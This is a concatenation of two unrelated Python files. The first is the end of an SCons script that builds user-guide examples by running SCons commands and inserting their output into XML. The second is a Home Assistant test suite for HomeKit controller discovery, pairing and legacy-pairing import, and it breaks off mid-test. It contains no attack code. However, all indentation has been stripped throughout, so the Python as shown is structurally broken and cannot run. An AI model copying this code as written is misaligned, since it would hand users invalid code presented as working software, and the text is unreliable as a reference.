except KeyError:
func = lambda args, c, t, dict: []
return func(args[1:], c, t, dict)
class MySGML(sgmllib.SGMLParser):
"""A subclass of the standard Python sgmllib SGML parser.
This extends the standard sgmllib parser to recognize, and do cool
stuff with, the added tags that describe our SCons examples,
commands, and other stuff.
"""
def __init__(self, outfp):
sgmllib.SGMLParser.__init__(self)
self.examples = {}
self.afunclist = []
self.outfp = outfp
# The first set of methods here essentially implement pass-through
# handling of most of the stuff in an SGML file. We're really
# only concerned with the tags specific to SCons example processing,
# the methods for which get defined below.
def handle_data(self, data):
try:
f = self.afunclist[-1]
except IndexError:
self.outfp.write(data)
else:
f(data)
def handle_comment(self, data):
self.outfp.write('<!--' + data + '-->')
def handle_decl(self, data):
self.outfp.write('<!' + data + '>')
def unknown_starttag(self, tag, attrs):
try:
f = self.example.afunc
except AttributeError:
f = self.outfp.write
if not attrs:
f('<' + tag + '>')
else:
f('<' + tag)
for name, value in attrs:
f(' ' + name + '=' + '"' + value + '"')
f('>')
def unknown_endtag(self, tag):
self.outfp.write('</' + tag + '>')
def unknown_entityref(self, ref):
self.outfp.write('&' + ref + ';')
def unknown_charref(self, ref):
self.outfp.write('&#' + ref + ';')
# Here is where the heavy lifting begins. The following methods
# handle the begin-end tags of our SCons examples.
def for_display(self, contents):
contents = contents.replace('__ROOT__', '')
contents = contents.replace('<', '<')
contents = contents.replace('>', '>')
return contents
def start_scons_example(self, attrs):
t = [t for t in attrs if t[0] == 'name']
if t:
name = t[0][1]
try:
e = self.examples[name]
except KeyError:
e = self.examples[name] = Example()
else:
e = Example()
for name, value in attrs:
setattr(e, name, value)
self.e = e
self.afunclist.append(e.afunc)
def end_scons_example(self):
e = self.e
files = [f for f in e.files if f.printme]
if files:
self.outfp.write('<programlisting>')
for f in files:
if f.printme:
i = len(f.data) - 1
while f.data[i] == ' ':
i = i - 1
output = self.for_display(f.data[:i+1])
self.outfp.write(output)
if e.data and e.data[0] == '\n':
e.data = e.data[1:]
self.outfp.write(e.data + '</programlisting>')
delattr(self, 'e')
self.afunclist = self.afunclist[:-1]
def start_file(self, attrs):
try:
e = self.e
except AttributeError:
self.error("<file> tag outside of <scons_example>")
t = [t for t in attrs if t[0] == 'name']
if not t:
self.error("no <file> name attribute found")
try:
e.prefix
except AttributeError:
e.prefix = e.data
e.data = ""
f = File(t[0][1])
f.printme = None
for name, value in attrs:
setattr(f, name, value)
e.files.append(f)
self.afunclist.append(f.afunc)
def end_file(self):
self.e.data = ""
self.afunclist = self.afunclist[:-1]
def start_directory(self, attrs):
try:
e = self.e
except AttributeError:
self.error("<directory> tag outside of <scons_example>")
t = [t for t in attrs if t[0] == 'name']
if not t:
self.error("no <directory> name attribute found")
try:
e.prefix
except AttributeError:
e.prefix = e.data
e.data = ""
d = Directory(t[0][1])
for name, value in attrs:
setattr(d, name, value)
e.dirs.append(d)
self.afunclist.append(d.afunc)
def end_directory(self):
self.e.data = ""
self.afunclist = self.afunclist[:-1]
def start_scons_example_file(self, attrs):
t = [t for t in attrs if t[0] == 'example']
if not t:
self.error("no <scons_example_file> example attribute found")
exname = t[0][1]
try:
e = self.examples[exname]
except KeyError:
self.error("unknown example name '%s'" % exname)
fattrs = [t for t in attrs if t[0] == 'name']
if not fattrs:
self.error("no <scons_example_file> name attribute found")
fname = fattrs[0][1]
f = [f for f in e.files if f.name == fname]
if not f:
self.error("example '%s' does not have a file named '%s'" % (exname, fname))
self.f = f[0]
def end_scons_example_file(self):
f = self.f
self.outfp.write('<programlisting>')
self.outfp.write(f.data + '</programlisting>')
delattr(self, 'f')
def start_scons_output(self, attrs):
t = [t for t in attrs if t[0] == 'example']
if not t:
self.error("no <scons_output> example attribute found")
exname = t[0][1]
try:
e = self.examples[exname]
except KeyError:
self.error("unknown example name '%s'" % exname)
# Default values for an example.
o = Output()
o.preserve = None
o.os = 'posix'
o.tools = ''
o.e = e
# Locally-set.
for name, value in attrs:
setattr(o, name, value)
self.o = o
self.afunclist.append(o.afunc)
def end_scons_output(self):
# The real raison d'etre for this script, this is where we
# actually execute SCons to fetch the output.
o = self.o
e = o.e
t = TestCmd.TestCmd(workdir='', combine=1)
if o.preserve:
t.preserve()
t.subdir('ROOT', 'WORK')
t.rootpath = t.workpath('ROOT').replace('\\', '\\\\')
for d in e.dirs:
dir = t.workpath('WORK', d.name)
if not os.path.exists(dir):
os.makedirs(dir)
for f in e.files:
i = 0
while f.data[i] == '\n':
i = i + 1
lines = f.data[i:].split('\n')
i = 0
while lines[0][i] == ' ':
i = i + 1
lines = [l[i:] for l in lines]
path = f.name.replace('__ROOT__', t.rootpath)
if not os.path.isabs(path):
path = t.workpath('WORK', path)
dir, name = os.path.split(path)
if dir and not os.path.exists(dir):
os.makedirs(dir)
content = '\n'.join(lines)
content = content.replace('__ROOT__', t.rootpath)
path = t.workpath('WORK', path)
t.write(path, content)
if hasattr(f, 'chmod'):
os.chmod(path, int(f.chmod, 0))
i = len(o.prefix)
while o.prefix[i-1] != '\n':
i = i - 1
self.outfp.write('<screen>' + o.prefix[:i])
p = o.prefix[i:]
# Regular expressions for making the doc output consistent,
# regardless of reported addresses or Python version.
# Massage addresses in object repr strings to a constant.
address_re = re.compile(r' at 0x[0-9a-fA-F]*\>')
# Massage file names in stack traces (sometimes reported as absolute
# paths) to a consistent relative path.
engine_re = re.compile(r' File ".*/src/engine/SCons/')
# Python 2.5 changed the stack trace when the module is read
# from standard input from read "... line 7, in ?" to
# "... line 7, in <module>".
file_re = re.compile(r'^( *File ".*", line \d+, in) \?$', re.M)
# Python 2.6 made UserList a new-style class, which changes the
# AttributeError message generated by our NodeList subclass.
nodelist_re = re.compile(r'(AttributeError:) NodeList instance (has no attribute \S+)')
for c in o.commandlist:
self.outfp.write(p + Prompt[o.os])
d = c.data.replace('__ROOT__', '')
self.outfp.write('<userinput>' + d + '</userinput>\n')
e = c.data.replace('__ROOT__', t.workpath('ROOT'))
args = e.split()
lines = ExecuteCommand(args, c, t, {'osname':o.os, 'tools':o.tools})
content = None
if c.output:
content = c.output
elif lines:
content = ( '\n' + p).join(lines)
if content:
content = address_re.sub(r' at 0x700000>', content)
content = engine_re.sub(r' File "bootstrap/src/engine/SCons/', content)
content = file_re.sub(r'\1 <module>', content)
content = nodelist_re.sub(r"\1 'NodeList' object \2", content)
content = self.for_display(content)
self.outfp.write(p + content + '\n')
if o.data[0] == '\n':
o.data = o.data[1:]
self.outfp.write(o.data + '</screen>')
delattr(self, 'o')
self.afunclist = self.afunclist[:-1]
def start_scons_output_command(self, attrs):
try:
o = self.o
except AttributeError:
self.error("<scons_output_command> tag outside of <scons_output>")
try:
o.prefix
except AttributeError:
o.prefix = o.data
o.data = ""
c = Command()
for name, value in attrs:
setattr(c, name, value)
o.commandlist.append(c)
self.afunclist.append(c.afunc)
def end_scons_output_command(self):
self.o.data = ""
self.afunclist = self.afunclist[:-1]
def start_sconstruct(self, attrs):
f = File('')
self.f = f
self.afunclist.append(f.afunc)
def end_sconstruct(self):
f = self.f
self.outfp.write('<programlisting>')
output = self.for_display(f.data)
self.outfp.write(output + '</programlisting>')
delattr(self, 'f')
self.afunclist = self.afunclist[:-1]
def process(filename, fout=sys.stdout):
if filename == '-':
f = sys.stdin
else:
try:
f = open(filename, 'r')
except EnvironmentError, e:
sys.stderr.write('%s: %s\n' % (filename, e))
return 1
data = f.read()
if f is not sys.stdin:
f.close()
if data.startswith('<?xml '):
first_line, data = data.split('\n', 1)
fout.write(first_line + '\n')
x = MySGML(fout)
for c in data:
x.feed(c)
x.close()
return 0
def main(argv=None):
if argv is None:
argv = sys.argv
parser = optparse.OptionParser()
parser.add_option('-d', '--diff',
action='store_true', dest='diff', default=False,
help='create examples for the .in file and output a unified diff against the related .xml file')
parser.add_option('-r', '--run',
action='store_true', dest='run', default=False,
help='create examples for the .in file, but do not change any files')
parser.add_option('-s', '--simple_diff',
action='store_true', dest='simple', default=False,
help='use a simpler output for the diff mode (no unified diff!)')
parser.add_option('-u', '--update',
action='store_true', dest='update', default=False,
help='create examples for the .in file and update the related .xml file')
opts, args = parser.parse_args(argv[1:])
if opts.diff:
import StringIO
import difflib
if not args:
args = glob.glob('doc/user/*.in')
for arg in sorted(args):
diff = None
s = StringIO.StringIO()
process(arg,s)
filename = arg[:-2]+'xml'
try:
fxml = open(filename, 'r')
xmlcontent = fxml.read()
fxml.close()
if opts.simple:
diff = list(difflib.context_diff(xmlcontent.splitlines(),
s.getvalue().splitlines(),
fromfile=arg, tofile=filename))
else:
diff = list(difflib.unified_diff(xmlcontent.splitlines(),
s.getvalue().splitlines(),
fromfile=arg, tofile=filename,
lineterm=''))
except EnvironmentError, e:
sys.stderr.write('%s: %s\n' % (filename, e))
s.close()
if diff:
print "%s:" % arg
print '\n'.join(diff)
elif opts.run:
if not args:
args = glob.glob('doc/user/*.in')
for arg in sorted(args):
print "%s:" % arg
process(arg)
elif opts.update:
if not args:
args = glob.glob('doc/user/*.in')
for arg in sorted(args):
print "%s:" % arg
filename = arg[:-2]+'xml'
try:
fxml = open(filename, 'w')
process(arg, fxml)
fxml.close()
except EnvironmentError, e:
sys.stderr.write('%s: %s\n' % (filename, e))
else:
if not args:
args = ['-']
for arg in args:
process(arg)
if __name__ == "__main__":
sys.exit(main())
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
|
"""Tests for homekit_controller config flow."""
import json
from unittest import mock
import homekit
import pytest
from homeassistant.components.homekit_controller import config_flow
from homeassistant.components.homekit_controller.const import KNOWN_DEVICES
from tests.common import MockConfigEntry
from tests.components.homekit_controller.common import (
Accessory,
FakeService,
setup_platform,
)
PAIRING_START_FORM_ERRORS = [
(homekit.BusyError, "busy_error"),
(homekit.MaxTriesError, "max_tries_error"),
(KeyError, "pairing_failed"),
]
PAIRING_START_ABORT_ERRORS = [
(homekit.AccessoryNotFoundError, "accessory_not_found_error"),
(homekit.UnavailableError, "already_paired"),
]
PAIRING_FINISH_FORM_ERRORS = [
(homekit.MaxPeersError, "max_peers_error"),
(homekit.AuthenticationError, "authentication_error"),
(homekit.UnknownError, "unknown_error"),
(KeyError, "pairing_failed"),
]
PAIRING_FINISH_ABORT_ERRORS = [
(homekit.AccessoryNotFoundError, "accessory_not_found_error")
]
def _setup_flow_handler(hass):
flow = config_flow.HomekitControllerFlowHandler()
flow.hass = hass
flow.context = {}
flow.controller = mock.Mock()
flow.controller.pairings = {}
return flow
async def _setup_flow_zeroconf(hass, discovery_info):
result = await hass.config_entries.flow.async_init(
"homekit_controller", context={"source": "zeroconf"}, data=discovery_info
)
return result
async def test_discovery_works(hass):
"""Test a device being discovered."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 1},
}
flow = _setup_flow_handler(hass)
# Device is discovered
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
# User initiates pairing - device enters pairing mode and displays code
result = await flow.async_step_pair({})
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.controller.start_pairing.call_count == 1
pairing = mock.Mock(pairing_data={"AccessoryPairingID": "00:00:00:00:00:00"})
pairing.list_accessories_and_characteristics.return_value = [
{
"aid": 1,
"services": [
{
"characteristics": [{"type": "23", "value": "Koogeek-LS1-20833F"}],
"type": "3e",
}
],
}
]
# Pairing doesn't error error and pairing results
flow.controller.pairings = {"00:00:00:00:00:00": pairing}
result = await flow.async_step_pair({"pairing_code": "111-22-33"})
assert result["type"] == "create_entry"
assert result["title"] == "Koogeek-LS1-20833F"
assert result["data"] == pairing.pairing_data
async def test_discovery_works_upper_case(hass):
"""Test a device being discovered."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"MD": "TestDevice", "ID": "00:00:00:00:00:00", "C#": 1, "SF": 1},
}
flow = _setup_flow_handler(hass)
# Device is discovered
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
# User initiates pairing - device enters pairing mode and displays code
result = await flow.async_step_pair({})
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.controller.start_pairing.call_count == 1
pairing = mock.Mock(pairing_data={"AccessoryPairingID": "00:00:00:00:00:00"})
pairing.list_accessories_and_characteristics.return_value = [
{
"aid": 1,
"services": [
{
"characteristics": [{"type": "23", "value": "Koogeek-LS1-20833F"}],
"type": "3e",
}
],
}
]
flow.controller.pairings = {"00:00:00:00:00:00": pairing}
result = await flow.async_step_pair({"pairing_code": "111-22-33"})
assert result["type"] == "create_entry"
assert result["title"] == "Koogeek-LS1-20833F"
assert result["data"] == pairing.pairing_data
async def test_discovery_works_missing_csharp(hass):
"""Test a device being discovered that has missing mdns attrs."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "sf": 1},
}
flow = _setup_flow_handler(hass)
# Device is discovered
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
# User initiates pairing - device enters pairing mode and displays code
result = await flow.async_step_pair({})
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.controller.start_pairing.call_count == 1
pairing = mock.Mock(pairing_data={"AccessoryPairingID": "00:00:00:00:00:00"})
pairing.list_accessories_and_characteristics.return_value = [
{
"aid": 1,
"services": [
{
"characteristics": [{"type": "23", "value": "Koogeek-LS1-20833F"}],
"type": "3e",
}
],
}
]
flow.controller.pairings = {"00:00:00:00:00:00": pairing}
result = await flow.async_step_pair({"pairing_code": "111-22-33"})
assert result["type"] == "create_entry"
assert result["title"] == "Koogeek-LS1-20833F"
assert result["data"] == pairing.pairing_data
async def test_abort_duplicate_flow(hass):
"""Already paired."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 1},
}
result = await _setup_flow_zeroconf(hass, discovery_info)
assert result["type"] == "form"
assert result["step_id"] == "pair"
result = await _setup_flow_zeroconf(hass, discovery_info)
assert result["type"] == "abort"
assert result["reason"] == "already_in_progress"
async def test_pair_already_paired_1(hass):
"""Already paired."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 0},
}
flow = _setup_flow_handler(hass)
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "abort"
assert result["reason"] == "already_paired"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
async def test_discovery_ignored_model(hass):
"""Already paired."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {
"md": config_flow.HOMEKIT_IGNORE[0],
"id": "00:00:00:00:00:00",
"c#": 1,
"sf": 1,
},
}
flow = _setup_flow_handler(hass)
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "abort"
assert result["reason"] == "ignored_model"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
async def test_discovery_invalid_config_entry(hass):
"""There is already a config entry for the pairing id but its invalid."""
MockConfigEntry(
domain="homekit_controller", data={"AccessoryPairingID": "00:00:00:00:00:00"}
).add_to_hass(hass)
# We just added a mock config entry so it must be visible in hass
assert len(hass.config_entries.async_entries()) == 1
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 1},
}
flow = _setup_flow_handler(hass)
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
# Discovery of a HKID that is in a pairable state but for which there is
# already a config entry - in that case the stale config entry is
# automatically removed.
config_entry_count = len(hass.config_entries.async_entries())
assert config_entry_count == 0
async def test_discovery_already_configured(hass):
"""Already configured."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 0},
}
await setup_platform(hass)
conn = mock.Mock()
conn.config_num = 1
hass.data[KNOWN_DEVICES]["00:00:00:00:00:00"] = conn
flow = _setup_flow_handler(hass)
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "abort"
assert result["reason"] == "already_configured"
assert flow.context == {}
assert conn.async_config_num_changed.call_count == 0
async def test_discovery_already_configured_config_change(hass):
"""Already configured."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 2, "sf": 0},
}
await setup_platform(hass)
conn = mock.Mock()
conn.config_num = 1
hass.data[KNOWN_DEVICES]["00:00:00:00:00:00"] = conn
flow = _setup_flow_handler(hass)
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "abort"
assert result["reason"] == "already_configured"
assert flow.context == {}
assert conn.async_refresh_entity_map.call_args == mock.call(2)
async def test_pair_unable_to_pair(hass):
"""Pairing completed without exception, but didn't create a pairing."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 1},
}
flow = _setup_flow_handler(hass)
# Device is discovered
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
# User initiates pairing - device enters pairing mode and displays code
result = await flow.async_step_pair({})
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.controller.start_pairing.call_count == 1
# Pairing doesn't error but no pairing object is generated
result = await flow.async_step_pair({"pairing_code": "111-22-33"})
assert result["type"] == "form"
assert result["errors"]["pairing_code"] == "unable_to_pair"
@pytest.mark.parametrize("exception,expected", PAIRING_START_ABORT_ERRORS)
async def test_pair_abort_errors_on_start(hass, exception, expected):
"""Test various pairing errors."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 1},
}
flow = _setup_flow_handler(hass)
# Device is discovered
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
# User initiates pairing - device refuses to enter pairing mode
with mock.patch.object(flow.controller, "start_pairing") as start_pairing:
start_pairing.side_effect = exception("error")
result = await flow.async_step_pair({})
assert result["type"] == "abort"
assert result["reason"] == expected
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
@pytest.mark.parametrize("exception,expected", PAIRING_START_FORM_ERRORS)
async def test_pair_form_errors_on_start(hass, exception, expected):
"""Test various pairing errors."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 1},
}
flow = _setup_flow_handler(hass)
# Device is discovered
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
# User initiates pairing - device refuses to enter pairing mode
with mock.patch.object(flow.controller, "start_pairing") as start_pairing:
start_pairing.side_effect = exception("error")
result = await flow.async_step_pair({})
assert result["type"] == "form"
assert result["errors"]["pairing_code"] == expected
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
@pytest.mark.parametrize("exception,expected", PAIRING_FINISH_ABORT_ERRORS)
async def test_pair_abort_errors_on_finish(hass, exception, expected):
"""Test various pairing errors."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 1},
}
flow = _setup_flow_handler(hass)
# Device is discovered
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
# User initiates pairing - device enters pairing mode and displays code
result = await flow.async_step_pair({})
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.controller.start_pairing.call_count == 1
# User submits code - pairing fails but can be retried
flow.finish_pairing.side_effect = exception("error")
result = await flow.async_step_pair({"pairing_code": "111-22-33"})
assert result["type"] == "abort"
assert result["reason"] == expected
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
@pytest.mark.parametrize("exception,expected", PAIRING_FINISH_FORM_ERRORS)
async def test_pair_form_errors_on_finish(hass, exception, expected):
"""Test various pairing errors."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 1},
}
flow = _setup_flow_handler(hass)
# Device is discovered
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
# User initiates pairing - device enters pairing mode and displays code
result = await flow.async_step_pair({})
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.controller.start_pairing.call_count == 1
# User submits code - pairing fails but can be retried
flow.finish_pairing.side_effect = exception("error")
result = await flow.async_step_pair({"pairing_code": "111-22-33"})
assert result["type"] == "form"
assert result["errors"]["pairing_code"] == expected
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
async def test_import_works(hass):
"""Test a device being discovered."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 1},
}
import_info = {"AccessoryPairingID": "00:00:00:00:00:00"}
pairing = mock.Mock(pairing_data={"AccessoryPairingID": "00:00:00:00:00:00"})
pairing.list_accessories_and_characteristics.return_value = [
{
"aid": 1,
"services": [
{
"characteristics": [{"type": "23", "value": "Koogeek-LS1-20833F"}],
"type": "3e",
}
],
}
]
flow = _setup_flow_handler(hass)
pairing_cls_imp = (
"homeassistant.components.homekit_controller.config_flow.IpPairing"
)
with mock.patch(pairing_cls_imp) as pairing_cls:
pairing_cls.return_value = pairing
result = await flow.async_import_legacy_pairing(
discovery_info["properties"], import_info
)
assert result["type"] == "create_entry"
assert result["title"] == "Koogeek-LS1-20833F"
assert result["data"] == pairing.pairing_data
async def test_import_already_configured(hass):
"""Test importing a device from .homekit that is already a ConfigEntry."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 1},
}
import_info = {"AccessoryPairingID": "00:00:00:00:00:00"}
config_entry = MockConfigEntry(domain="homekit_controller", data=import_info)
config_entry.add_to_hass(hass)
flow = _setup_flow_handler(hass)
result = await flow.async_import_legacy_pairing(
discovery_info["properties"], import_info
)
assert result["type"] == "abort"
assert result["reason"] == "already_configured"
async def test_user_works(hass):
"""Test user initiated disovers devices."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"md": "TestDevice",
"id": "00:00:00:00:00:00",
"c#": 1,
"sf": 1,
}
pairing = mock.Mock(pairing_data={"AccessoryPairingID": "00:00:00:00:00:00"})
pairing.list_accessories_and_characteristics.return_value = [
{
"aid": 1,
"services": [
{
"characteristics": [{"type": "23", "value": "Koogeek-LS1-20833F"}],
"type": "3e",
}
],
}
]
flow = _setup_flow_handler(hass)
flow.controller.pairings = {"00:00:00:00:00:00": pairing}
flow.controller.discover.return_value = [discovery_info]
result = await flow.async_step_user()
assert result["type"] == "form"
assert result["step_id"] == "user"
result = await flow.async_step_user({"device": "TestDevice"})
assert result["type"] == "form"
assert result["step_id"] == "pair"
result = await flow.async_step_pair({"pairing_code": "111-22-33"})
assert result["type"] == "create_entry"
assert result["title"] == "Koogeek-LS1-20833F"
assert result["data"] == pairing.pairing_data
async def test_user_no_devices(hass):
"""Test user initiated pairing where no devices discovered."""
flow = _setup_flow_handler(hass)
flow.controller.discover.return_value = []
result = await flow.async_step_user()
assert result["type"] == "abort"
assert result["reason"] == "no_devices"
async def test_user_no_unpaired_devices(hass):
"""Test user initiated pairing where no unpaired devices discovered."""
flow = _setup_flow_handler(hass)
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"md": "TestDevice",
"id": "00:00:00:00:00:00",
"c#": 1,
"sf": 0,
}
flow.controller.discover.return_value = [discovery_info]
result = await flow.async_step_user()
assert result["type"] == "abort"
assert result["reason"] == "no_devices"
async def test_parse_new_homekit_json(hass):
"""Test migrating recent .homekit/pairings.json files."""
service = FakeService("public.hap.service.lightbulb")
on_char = service.add_characteristic("on")
on_char.value = 1
accessory = Accessory("TestDevice", "example.com", "Test", "0001", "0.1")
accessory.services.append(service)
fake_controller = await setup_platform(hass)
pairing = fake_controller.add([accessory])
pairing.pairing_data = {"AccessoryPairingID": "00:00:00:00:00:00"}
mock_path = mock.Mock()
mock_path.exists.side_effect = [True, False]
read_data = {"00:00:00:00:00:00": pairing.pairing_data}
mock_open = mock.mock_open(read_data=json.dumps(read_data))
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 0},
}
flow = _setup_flow_handler(hass)
pairing_cls_imp = (
"homeassistant.components.homekit_controller.config_flow.IpPairing"
)
with mock.patch(pairing_cls_imp) as pairing_cls:
pairing_cls.return_value = pairing
with mock.patch("builtins.open", mock_open):
with mock.patch("os.path", mock_path):
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "create_entry"
assert result["title"] == "TestDevice"
assert result["data"]["AccessoryPairingID"] == "00:00:00:00:00:00"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
async def test_parse_old_homekit_json(hass):
"""Test migrating original .homekit/hk-00:00:00:00:00:00 files."""
service = FakeService("public.hap.service.lightbulb")
on_char = service.add_characteristic("on")
on_char.value = 1
accessory = Accessory("TestDevice", "example.com", "Test", "0001", "0.1")
accessory.services.append(service)
fake_controller = await setup_platform(hass)
pairing = fake_controller.add([accessory])
pairing.pairing_data = {"AccessoryPairingID": "00:00:00:00:00:00"}
mock_path = mock.Mock()
mock_path.exists.side_effect = [False, True]
mock_listdir = mock.Mock()
mock_listdir.return_value = ["hk-00:00:00:00:00:00", "pairings.json"]
read_data = {"AccessoryPairingID": "00:00:00:00:00:00"}
mock_open = mock.mock_open(read_data=json.dumps(read_data))
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 0},
}
flow = _setup_flow_handler(hass)
pairing_cls_imp = (
"homeassistant.components.homekit_controller.config_flow.IpPairing"
)
with mock.patch(pairing_cls_imp) as pairing_cls:
pairing_cls.return_value = pairing
with mock.patch("builtins.open", mock_open):
with mock.patch("os.path", mock_path):
with mock.patch("os.listdir", mock_listdir):
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "create_entry"
assert result["title"] == "TestDevice"
assert result["data"]["AccessoryPairingID"] == "00:00:00:00:00:00"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
async def test_parse_overlapping_homekit_json(hass):
"""Test migrating .homekit/pairings.json files when hk- exists too."""
service = FakeService("public.hap.service.lightbulb")
on_char = service.add_characteristic("on")
on_char.value = 1
accessory = Accessory("TestDevice", "example.com", "Test", "0001", "0.1")
accessory.services.append(service)
fake_controller = await setup_platform(hass)
pairing = fake_controller.add([accessory])
pairing.pairing_data = {"AccessoryPairingID": "00:00:00:00:00:00"}
mock_listdir = mock.Mock()
mock_listdir.return_value = ["hk-00:00:00:00:00:00", "pairings.json"]
mock_path = mock.Mock()
mock_path.exists.side_effect = [True, True]
# First file to get loaded is .homekit/pairing.json
read_data_1 = {"00:00:00:00:00:00": {"AccessoryPairingID": "00:00:00:00:00:00"}}
mock_open_1 = mock.mock_open(read_data=json.dumps(read_data_1))
# Second file to get loaded is .homekit/hk-00:00:00:00:00:00
